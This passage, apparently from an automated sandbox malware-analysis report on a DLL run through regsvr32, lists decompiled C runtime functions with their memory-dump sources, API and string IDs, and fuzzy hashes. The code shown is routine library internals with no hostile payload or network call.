                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}






                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-192189897
                                                                                • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                • Instruction ID: 3faf77245274c6ae95f6320dee5e2acaf85e0577ffd06909a4f8489e20704f44
                                                                                • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                • Instruction Fuzzy Hash: CD414E6291C6C68AE7709B20E8543BE77F4EB86304F484135D6AD86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 00007FFA52479578
                                                                                • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 00007FFA52479563
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                • API String ID: 275287319-2412454244
                                                                                • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                • Instruction ID: bd5f9d88e1e7e2c2615a2b36019460bf31bf37452f277ea728f5b3000058011d
                                                                                • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                • Instruction Fuzzy Hash: 51315072628A9586D710CB24E88056E77B1FB867A0F548335E6BE47AEDCF7CE401CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_unlock
                                                                                • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2816345473-1282596470
                                                                                • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                • Instruction ID: cbc37eaa1383070161797423e07e8bb648d5dd99abffa2b1b45ae1562d6d9895
                                                                                • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                • Instruction Fuzzy Hash: EC31157292C6429AE3509B24EC4572A77F0FB46360F089134E66D8BAD9DBFCF4498F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                                                • String ID: csm
                                                                                • API String ID: 933340387-1018135373
                                                                                • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                • Instruction ID: 129c8b431d493a9c3b2ba885d2887352e8771f001211cf207517ef87e8072bc6
                                                                                • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                • Instruction Fuzzy Hash: 5A21143290868182DA609F15E45036D77F0FBC2B55F589132EB9E4B7A9CFBDD442CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_nolock$_unlock
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                                                • API String ID: 2500497606-1087415141
                                                                                • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                • Instruction ID: df93fea09bf852844e919ef6a0af566b0c014063c3e1d5e4307c62a0bed9a222
                                                                                • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                • Instruction Fuzzy Hash: 0C21F836639B8591E7409B15E890739A3F0FB86B90F58E435EA9E477A8CFBCD484C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-23161695
                                                                                • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                • Instruction ID: c5e5f8a4752abdc13b6ecfa0fc9c2f861bdac0999d33e3b6a0ff83f776d85976
                                                                                • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                • Instruction Fuzzy Hash: 38115771A286469AE7509B20EC8036A33F1FB42744F98A235E26D02698DFFCE5458F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-3042049227
                                                                                • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                • Instruction ID: 99504056d4af8ea14344323df643fe508dda6a642c8bcdf719dbbf2f4c872f68
                                                                                • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                • Instruction Fuzzy Hash: C8113971A0C64AAAF7209B20EC513BA63F0AB82354F988136D5AC066C9DFBCE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-1338331675
                                                                                • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                • Instruction ID: d97e811d2c66d47f348946a2d94f65ff130e5df080f6e893cbb954951b8ecc28
                                                                                • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                • Instruction Fuzzy Hash: BA014C71A18A46D6F7109B20EC8036937F0FB42354FA88135E66D076D9CFBCE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer__doserrno_invalid_parameter
                                                                                • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 1098298932-1795423647
                                                                                • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                • Instruction ID: 7221a7dbcdd280ebd4223e2a77645889807170e96cc48f512326ef5196731f48
                                                                                • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                • Instruction Fuzzy Hash: EAE0C961A1C94AA5F6619F21EC113BA26B1AF42B48F998232D16C0B2DADFBCA5058740
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00007FFA7FFA5247FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                
                                                                                				_a8 = __ecx;
                                                                                				_v24 = 0;
                                                                                				_v16 = 0;
                                                                                				0x52469300();
                                                                                				_v20 = 0;
                                                                                				_v20 = _v20 + 1;
                                                                                				if (_v20 -  *0x5248e520 >= 0) goto 0x52480042;
                                                                                				if ( *((long long*)( *0x5248d500 + _v20 * 8)) == 0) goto 0x5248003d;
                                                                                				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x5248003d;
                                                                                				E00007FFA7FFA5247AE90(_v20,  *((intOrPtr*)( *0x5248d500 + _v20 * 8)));
                                                                                				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x52480024;
                                                                                				if (_a8 != 1) goto 0x5247ffe1;
                                                                                				if (E00007FFA7FFA5247FD70( *((intOrPtr*)( *0x5248d500 + _v20 * 8))) == 0xffffffff) goto 0x5247ffdf;
                                                                                				_v24 = _v24 + 1;
                                                                                				goto 0x52480024;
                                                                                				if (_a8 != 0) goto 0x52480024;
                                                                                				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0x52480024;
                                                                                				if (E00007FFA7FFA5247FD70( *((intOrPtr*)( *0x5248d500 + _v20 * 8))) != 0xffffffff) goto 0x52480024;
                                                                                				_v16 = 0xffffffff;
                                                                                				E00007FFA7FFA5247AF60(_v20,  *((intOrPtr*)( *0x5248d500 + _v20 * 8)));
                                                                                				goto L1;
                                                                                				__ecx = 1;
                                                                                				__eax = E00007FFA7FFA52469360(__eax, 1);
                                                                                				if (_a8 != 1) goto 0x5248005b;
                                                                                				__eax = _v24;
                                                                                				goto 0x5248005f;
                                                                                				__eax = _v16;
                                                                                				return _v16;
                                                                                			}







                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                                                • String ID:
                                                                                • API String ID: 1144694634-0
                                                                                • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                • Instruction ID: a4bcb9c9b491f17eba209ffc94d4af3ceee23d9adc6a7ac84dae6665177df253
                                                                                • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                • Instruction Fuzzy Hash: 5C410536928901D5DB30DF19E88163973F0FB8AB58F184236E66D877A9CF7DD941CA00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA52473CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                				long long _v16;
                                                                                				long long _v24;
                                                                                				intOrPtr _v32;
                                                                                				long long _v40;
                                                                                				long long _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v56;
                                                                                				signed int _v64;
                                                                                				long long _v72;
                                                                                				char _v80;
                                                                                				long long _v88;
                                                                                				void* _t135;
                                                                                				void* _t145;
                                                                                				void* _t147;
                                                                                				void* _t148;
                                                                                				void* _t149;
                                                                                				signed int* _t200;
                                                                                				intOrPtr _t206;
                                                                                
                                                                                				_a32 = __r9;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				0x52464000();
                                                                                				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0x52473d6c;
                                                                                				if ( *_a8 == 0xe06d7363) goto 0x52473d6c;
                                                                                				if ( *_a8 != 0x80000029) goto 0x52473d2a;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0x52473d2a;
                                                                                				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0x52473d6c;
                                                                                				if ( *_a8 == 0x80000026) goto 0x52473d6c;
                                                                                				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0x52473d6c;
                                                                                				if ((_a40[9] & 0x00000001) == 0) goto 0x52473d6c;
                                                                                				goto 0x5247409c;
                                                                                				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0x52473ef3;
                                                                                				if (_a40[1] == 0) goto 0x52473ee4;
                                                                                				if (_a48 != 0) goto 0x52473ee4;
                                                                                				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x52473e40;
                                                                                				if ( *_a8 != 0x80000026) goto 0x52473e40;
                                                                                				_v56 = E00007FFA7FFA52473A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                                                				if (_v56 - 0xffffffff < 0) goto 0x52473e0a;
                                                                                				if (_v56 - _a40[1] >= 0) goto 0x52473e0a;
                                                                                				goto 0x52473e0f;
                                                                                				E00007FFA7FFA5246CF80(_a40);
                                                                                				r9d = _v56;
                                                                                				E00007FFA7FFA52474F20(_a40, _a16, _a32, _a40);
                                                                                				goto 0x52473ec7;
                                                                                				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x52473ec7;
                                                                                				if ( *_a8 != 0x80000029) goto 0x52473ec7;
                                                                                				_v48 = _a8;
                                                                                				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                                                				if (_v52 - 0xffffffff < 0) goto 0x52473e95;
                                                                                				if (_v52 - _a40[1] >= 0) goto 0x52473e95;
                                                                                				goto 0x52473e9a;
                                                                                				E00007FFA7FFA5246CF80(_a40);
                                                                                				r9d = _v52;
                                                                                				E00007FFA7FFA52474F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                                                				goto 0x5247409c;
                                                                                				E00007FFA7FFA5246E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                                                				goto 0x52474097;
                                                                                				if (_a40[3] != 0) goto 0x52473f59;
                                                                                				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0x52474097;
                                                                                				_t200 = _a40;
                                                                                				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0x52473f44;
                                                                                				_t135 = E00007FFA7FFA5246E680( *_a40 & 0x1fffffff, _t200);
                                                                                				_v24 = _t200 + _a40[8];
                                                                                				goto 0x52473f4d;
                                                                                				_v24 = 0;
                                                                                				if (_v24 == 0) goto 0x52474097;
                                                                                				if ( *_a8 != 0xe06d7363) goto 0x52474041;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0x52474041;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0x52474041;
                                                                                				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                                                				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0x52473fc5;
                                                                                				E00007FFA7FFA5246E6A0(_t135, _t206);
                                                                                				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                                                				goto 0x52473fce;
                                                                                				_v16 = 0;
                                                                                				_v40 = _v16;
                                                                                				_t177 = _v40;
                                                                                				if (_v40 == 0) goto 0x52474041;
                                                                                				_v64 = _a64 & 0x000000ff;
                                                                                				_v72 = _a56;
                                                                                				_v80 = _a48;
                                                                                				_v88 = _a40;
                                                                                				_v32 = _v40();
                                                                                				goto 0x52474097;
                                                                                				_v64 = _a56;
                                                                                				_v72 = _a48;
                                                                                				_v80 = _a64 & 0x000000ff;
                                                                                				_v88 = _a40;
                                                                                				E00007FFA7FFA524740B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                                                				return 1;
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _inconsistency
                                                                                • String ID: csm$csm
                                                                                • API String ID: 32975420-3733052814
                                                                                • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                • Instruction ID: cc5862943c7cde91c1b94dcf80f3e0e67201cc3c4a68e605b82c0242472d687d
                                                                                • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                • Instruction Fuzzy Hash: CDA1FA366087C5C6DB708B15E4443AABBB0F786B94F588026EADD87B99CF7CD445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 00007FFA52469932
                                                                                • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 00007FFA5246991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __free_lconv_mon__free_lconv_num
                                                                                • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                                                • API String ID: 2148069796-2706031433
                                                                                • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                • Instruction ID: 46953ce5f81f6f5705f7853f8b07a31c46d718a7688665a949950b2c7fcf8bd8
                                                                                • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                • Instruction Fuzzy Hash: 13A1D932618A8581EB509B45E4C53BEA3B1F7C5B50F499436EA8E4B7A9CFFCE485C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-3717698799
                                                                                • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                • Instruction ID: b1bc80c2222c99ec7391c33132b24cc28a21d6ccace8292ddcc0981130d1fc69
                                                                                • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                • Instruction Fuzzy Hash: F181DD31A1DA8686DA70CB65E84436A63F0F786764F188235E6BD437DDDFBCE4468B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
